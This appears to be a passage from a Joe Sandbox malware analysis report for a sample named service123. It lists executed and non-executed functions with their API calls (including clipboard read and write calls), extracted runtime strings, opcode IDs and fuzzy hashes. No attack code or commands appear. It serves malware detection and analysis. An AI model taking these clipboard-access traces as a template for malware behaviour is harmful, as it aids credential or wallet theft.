Opcode Fuzzy Hash: d04f2c394cf1b77195c6e266fa354bd0412173ca78a515ea232fba94b154dbc2
Instruction Fuzzy Hash: 7B01E4B150834ACFCB10EF64C54975BBFF8EB85345F01881CE88897650EB78A099CB92

Function 006C1296 Relevance: 5.1, APIs: 4, Instructions: 80
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 006C12EB
strlen.MSVCRT ref: 006C1323
malloc.MSVCRT ref: 006C132E
memcpy.MSVCRT ref: 006C1344

Memory Dump Source

Source File: 00000005.00000002.3291178765.00000000006C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000005.00000002.3291157159.00000000006C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291198404.00000000006CA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291248714.00000000006CE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291274007.00000000006D1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c0000_service123.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: 2b7d0a17d5b322af32d42d7ab572b63165930830a4c06caa0ba1eec09a6511e9
Instruction ID: 4a95c532b8600053beab68b59c9f3edb6794be47dbf3e6c04cbe5502ae2f86be
Opcode Fuzzy Hash: 2b7d0a17d5b322af32d42d7ab572b63165930830a4c06caa0ba1eec09a6511e9
Instruction Fuzzy Hash: C33136B5A043158FCB20DF68D884BB9BBF2FB4A304F05852DD949AB312D735A906CF81

Function 006C13BB Relevance: 5.1, APIs: 4, Instructions: 66
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 006C12EB
strlen.MSVCRT ref: 006C1323
malloc.MSVCRT ref: 006C132E
memcpy.MSVCRT ref: 006C1344

Memory Dump Source

Source File: 00000005.00000002.3291178765.00000000006C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000005.00000002.3291157159.00000000006C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291198404.00000000006CA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291248714.00000000006CE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291274007.00000000006D1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c0000_service123.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: 0f2fd2f7875ac8ee97d29f4fdcbba593e528532aee45854bf57d9f79c27b6007
Instruction ID: d366aa6c583961b36bc6272b6656f9d50ae808db05a1e981bd6d0b64a0e4e4b8
Opcode Fuzzy Hash: 0f2fd2f7875ac8ee97d29f4fdcbba593e528532aee45854bf57d9f79c27b6007
Instruction Fuzzy Hash: 2F21F3B5E057118FCB24DF68D884AA9B7F2FB89304F11892ED948AB311D730A906CF85

Function 6C22B3F0 Relevance: 1.4, APIs: 1, Instructions: 144
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa7d701332c04033c59dc056aa5327c6728679af56436deae94d667c8fa66f71
Instruction ID: b651f373d55ce1b60d56ec9a51d2db8ea3a5f5d6dfe3b546d657f0de08a8189e
Opcode Fuzzy Hash: aa7d701332c04033c59dc056aa5327c6728679af56436deae94d667c8fa66f71
Instruction Fuzzy Hash: ED516DB5A0530A8FD700DF19E08461AFBF0FF8A318F544569ED59ABB10E774E844CBA2

Function 6C22B560 Relevance: 1.3, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eab69040555e35d4a6e412d7410dcda7a015e798edddd199422e36a3579bfc74
Instruction ID: a39b92848e0803606b526f3be9aaef402bd63e7bc32ded539de900ed38b9232d
Opcode Fuzzy Hash: eab69040555e35d4a6e412d7410dcda7a015e798edddd199422e36a3579bfc74
Instruction Fuzzy Hash: 5831D1B17152098FDB109F29D4C0746B7F4BF9A318F884668DE159FB85E778D404CBA2

Non-executed Functions

Function 6C21CD00 Relevance: 33.4, APIs: 22, Instructions: 445stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C21CD7D

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 8f8f5dca7f204f216307d2120cc5925d89289b2761f582b07128dd9313493072
Instruction ID: f29fcbb688c560bc324471baeb1b3f300f2aeaaf0477c324eff33168fe1f67c2
Opcode Fuzzy Hash: 8f8f5dca7f204f216307d2120cc5925d89289b2761f582b07128dd9313493072
Instruction Fuzzy Hash: 7402387150C75A8FD701CF28C044795FBE2AF86318F1982AEEEA857F91C776A449CB81

Function 6C220FC0 Relevance: 22.6, APIs: 8, Strings: 4, Instructions: 1647stringCOMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 6C220FCA
strlen.MSVCRT ref: 6C220FD4

Strings

5, xrefs: 6C2214D2
!, xrefs: 6C222C08
, xrefs: 6C22240F
inity, xrefs: 6C221E21

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: localeconvstrlen
String ID: $!$5$inity
API String ID: 186660782-1328200385
Opcode ID: 737958011edaf824a63bfc87cc40b97badc030e596dd6afb299bf234627a2383
Instruction ID: 1efaf4afc0cab94441a3de287ffa935a12a41476470e4e7e77f6147c402d72f1
Opcode Fuzzy Hash: 737958011edaf824a63bfc87cc40b97badc030e596dd6afb299bf234627a2383
Instruction Fuzzy Hash: 19F23AB5A183898FD720CF28C484B9ABBE1FF89318F51891DE8D997750D77AD844CB42

Function 6C2984D0 Relevance: 17.7, Strings: 14, Instructions: 166COMMON

Download Yara Rule

Strings

Auth, xrefs: 6C298676
Auth, xrefs: 6C29854F
Auth, xrefs: 6C2985E7
random_device::random_device(const std::string&): unsupported token, xrefs: 6C2986D2
rdseed, xrefs: 6C298518
rdrnd, xrefs: 6C298618
hardware, xrefs: 6C2986A0
default, xrefs: 6C2984EF
Genu, xrefs: 6C29866E
rdrand, xrefs: 6C2985A8
random_device::random_device(const std::string&): device not available, xrefs: 6C298598
rand_s, xrefs: 6C2986B7
Genu, xrefs: 6C2985DF
Genu, xrefs: 6C298557

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: memcmpstrlen
String ID: Auth$Auth$Auth$Genu$Genu$Genu$default$hardware$rand_s$random_device::random_device(const std::string&): device not available$random_device::random_device(const std::string&): unsupported token$rdrand$rdrnd$rdseed
API String ID: 3108337309-1359127009
Opcode ID: 023f5375b272b81dd7ba3f827b585c005e9ecf0cc136814af6415e58ee08cca9
Instruction ID: 307d71419a2ce70055b49639e7192ba4f499472ca1b82f93250012be51c2e8fb
Opcode Fuzzy Hash: 023f5375b272b81dd7ba3f827b585c005e9ecf0cc136814af6415e58ee08cca9
Instruction Fuzzy Hash: A14149F261934E4BE3006A3AC48231AF6A6BB4031CF69493EEC86DBF51D735D559C712

Function 6C21EE50 Relevance: 12.5, APIs: 8, Instructions: 494COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C21F18B
malloc.MSVCRT ref: 6C21F1A8

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 7008760eda75e20a0adea627002fb36ed174c57a283e5f87649b070aa0ae4156
Instruction ID: 38ab39da7d2867c0cf9dfd623b8ae94b23869cbe4d03bbfef326e4d0e2d2c701
Opcode Fuzzy Hash: 7008760eda75e20a0adea627002fb36ed174c57a283e5f87649b070aa0ae4156
Instruction Fuzzy Hash: BB12497560C74A8FC310CF19C48065BB7E2BF88358F558A2DEEA997F50D734E9098B92

Function 6C23E6E0 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 219stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C23E70A
strlen.MSVCRT ref: 6C23E77A

Strings

basic_string: construction from null is not valid, xrefs: 6C23E742, 6C23E7B2, 6C23E822
basic_string: construction from null is not valid, xrefs: 6C23E86F, 6C23E8C0, 6C23E910

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string: construction from null is not valid$basic_string: construction from null is not valid
API String ID: 39653677-1250104765
Opcode ID: 44123cb2936dcf4473340bcc163ce905c5558b25e2334f63115023ccad39f621
Instruction ID: 07571d338c5657018a3a7b1a2ef242bc53e072d0397250da846837fb1ed472f8
Opcode Fuzzy Hash: 44123cb2936dcf4473340bcc163ce905c5558b25e2334f63115023ccad39f621
Instruction Fuzzy Hash: 476160F1A156198FCB00FF28D48549AF7E4BB45218F46496DEC889B315D231DC99CBD2

Function 6C229D11 Relevance: 12.0, APIs: 8, Instructions: 46clipboardmemorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2B39D0: strlen.MSVCRT ref: 6C2B39DE

OpenClipboard.USER32 ref: 6C229D31
GlobalAlloc.KERNEL32 ref: 6C229D55
GlobalLock.KERNEL32 ref: 6C229D72
strcpy.MSVCRT ref: 6C229D82
GlobalUnlock.KERNEL32 ref: 6C229D8A
EmptyClipboard.USER32 ref: 6C229D93
SetClipboardData.USER32 ref: 6C229DA4
CloseClipboard.USER32 ref: 6C229DAD

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlockstrcpystrlen
String ID:
API String ID: 3344633682-0
Opcode ID: fa9612d8dcee04550caae8d1f9801ee7fb315f61561633b8db61fddf25b8b652
Instruction ID: c0daede8a788d82ce4e042e41e5624331acf20252680fb1ac4ac55923af587b3
Opcode Fuzzy Hash: fa9612d8dcee04550caae8d1f9801ee7fb315f61561633b8db61fddf25b8b652
Instruction Fuzzy Hash: F411C5B1518749CBDB10BF78C5892AEBBF4BF05309F01482DE98A87644EF39D458CB52

Function 6C230860 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 212stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C230886
memcmp.MSVCRT ref: 6C2308A9
memcmp.MSVCRT ref: 6C23091F
memcmp.MSVCRT ref: 6C230991

Part of subcall function 6C2DADB0: strlen.MSVCRT ref: 6C2DADBE

memcmp.MSVCRT ref: 6C230A25

Strings

basic_string::compare, xrefs: 6C2308C8, 6C23093C, 6C2309AF, 6C230A44, 6C230A60
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C2308D0, 6C230944, 6C2309B7, 6C230A4C, 6C230A68

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: 736713790f7928dbb3ad09e4e530e6b0a402b9052e0a184efb352c560a6c68ee
Instruction ID: 8fdfdcacf0a0705be94c5c825c16336df2a0a9862b9c750298b51b88329c10d1
Opcode Fuzzy Hash: 736713790f7928dbb3ad09e4e530e6b0a402b9052e0a184efb352c560a6c68ee
Instruction Fuzzy Hash: A3614AB660A3199FC300EF69D88045BFBE5AFD8784F65996DE8C8C7710D231D844CBA2

Function 6C2270C0 Relevance: 9.6, APIs: 6, Instructions: 649COMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 6C2270C7
memset.MSVCRT ref: 6C227217

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: localeconvmemset
String ID:
API String ID: 2367598729-0
Opcode ID: 451440347954d229b61f3cc8be3cf79ff1883a727319633653bfeb11af955ec6
Instruction ID: 2e64d3775f6b0b1ae57ba51fc6a3189b66e57b99893af95d4feb5b4498000e55
Opcode Fuzzy Hash: 451440347954d229b61f3cc8be3cf79ff1883a727319633653bfeb11af955ec6
Instruction Fuzzy Hash: DA42BF7160D31A8FD700CF29C49075ABBE2BF85B09F154A2DEC948BB41D779E949CB82

Function 6C225880 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 1506COMMON

Download Yara Rule

Strings

NaN, xrefs: 6C225B5F
, xrefs: 6C227074
, xrefs: 6C226D95
Infinity, xrefs: 6C225BE0

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID: $ $Infinity$NaN
API String ID: 0-3274152445
Opcode ID: 17b57708d61bf74a21892cd98688dc006b432b243dce5e4828319c1679ed992a
Instruction ID: 1e05f52fc3fe57dc348830a9bdf857737a5f207d6b740c40aec306c1e967480b
Opcode Fuzzy Hash: 17b57708d61bf74a21892cd98688dc006b432b243dce5e4828319c1679ed992a
Instruction Fuzzy Hash: 4AE224B2A093898FD710CF29C18074ABBE0FF89758F14892DE89597755E779E844CF82

Function 6C229E27 Relevance: 6.0, APIs: 4, Instructions: 38clipboardCOMMON

Download Yara Rule

APIs

GetClipboardData.USER32 ref: 6C229E37
GlobalLock.KERNEL32 ref: 6C229E49
GlobalUnlock.KERNEL32 ref: 6C229E6A
CloseClipboard.USER32 ref: 6C229E73
CloseClipboard.USER32 ref: 6C229E98

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: Clipboard$CloseGlobal$DataLockUnlock
String ID:
API String ID: 3186146249-0
Opcode ID: f2d20f2539332eab83cd837f2f886842fc547d1a4c1b198e87e9edcd6a4cf54d
Instruction ID: 4e720c087824cf25924c95623e042d753f96a4f6bd7e6584df6ca22b14e21460
Opcode Fuzzy Hash: f2d20f2539332eab83cd837f2f886842fc547d1a4c1b198e87e9edcd6a4cf54d
Instruction Fuzzy Hash: D9F06DB26046058FEB107F7895481AEBBF4AB45255F04093DDC8AA7240EF34D4188B93

Function 006C51B0 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 1506COMMON

Download Yara Rule

Strings

, xrefs: 006C66C5
, xrefs: 006C69A4

Memory Dump Source

Source File: 00000005.00000002.3291178765.00000000006C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000005.00000002.3291157159.00000000006C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291198404.00000000006CA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291248714.00000000006CE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291274007.00000000006D1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c0000_service123.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: 7dbf9ce50898dad5177cad89646410db72837e839e12bf6f01c8176ff4f8d3e8
Instruction ID: a4b38fe97041965bec4b5c6c774d91cc0b724aee2d7cd3c23df0621627f8e26a
Opcode Fuzzy Hash: 7dbf9ce50898dad5177cad89646410db72837e839e12bf6f01c8176ff4f8d3e8
Instruction Fuzzy Hash: F0E222B1A087418FC710DF29C584B6ABBE2FF88744F14891DF88A97351E775E8858F86

Function 006C3E20 Relevance: 5.4, Strings: 4, Instructions: 351COMMON

Download Yara Rule

Strings

., xrefs: 006C4114
gfff, xrefs: 006C3F43
@, xrefs: 006C3FD9
gfff, xrefs: 006C3F2C

Memory Dump Source

Source File: 00000005.00000002.3291178765.00000000006C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000005.00000002.3291157159.00000000006C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291198404.00000000006CA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291248714.00000000006CE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291274007.00000000006D1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c0000_service123.jbxd

Similarity

API ID:
String ID: .$@$gfff$gfff
API String ID: 0-2633265772
Opcode ID: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
Instruction ID: bf314ea0878bac923abe16796aba680440d3badf54a32655ef527d853d3eb27c
Opcode Fuzzy Hash: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
Instruction Fuzzy Hash: 95D1BF71A083068BC714DE29C494B7BBBE3EF94340F18C92DE8998B745DB74DD498B92

Function 6C2244F0 Relevance: 5.4, Strings: 4, Instructions: 351COMMON

Download Yara Rule

Strings

gfff, xrefs: 6C224613
., xrefs: 6C2247E4
@, xrefs: 6C2246A9
gfff, xrefs: 6C2245FC

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID: .$@$gfff$gfff
API String ID: 0-2633265772
Opcode ID: 8626a3e6e77548aa8c80ec26b31963b047f7067a9e1e968e0f87eb2c543a7be7
Instruction ID: f3b4c7035b26916026fd9db15a2fbfc95e87bee9eaef941c9d8a879fc41956da
Opcode Fuzzy Hash: 8626a3e6e77548aa8c80ec26b31963b047f7067a9e1e968e0f87eb2c543a7be7
Instruction Fuzzy Hash: CFD1D671A1834A8BD700CF29C88075BBBE2EFC5358F18C52DEC948BB55D778D9498B82

Function 6C2B3140 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

basic_string: construction from null is not valid, xrefs: 6C2B3250

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID: basic_string: construction from null is not valid
API String ID: 0-2991274800
Opcode ID: 9e724c54a21e276a3b53c04a9e02be15bc3f5dcd2e68b2d6a6a32c88eaec92be
Instruction ID: 321e586c8dbdfcdd4c8fad6189c0f784d850d08cce87f939c42a22d73cbc6a93
Opcode Fuzzy Hash: 9e724c54a21e276a3b53c04a9e02be15bc3f5dcd2e68b2d6a6a32c88eaec92be
Instruction Fuzzy Hash: 82418BB29097118FC714DF2DD480A4AFBE4BF99358F15896EEC989B305D730D845CB92

Function 6C2B0730 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6C2B07A0
memset.MSVCRT ref: 6C2B07C4

Strings

basic_string::_M_replace_aux, xrefs: 6C2B0840

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
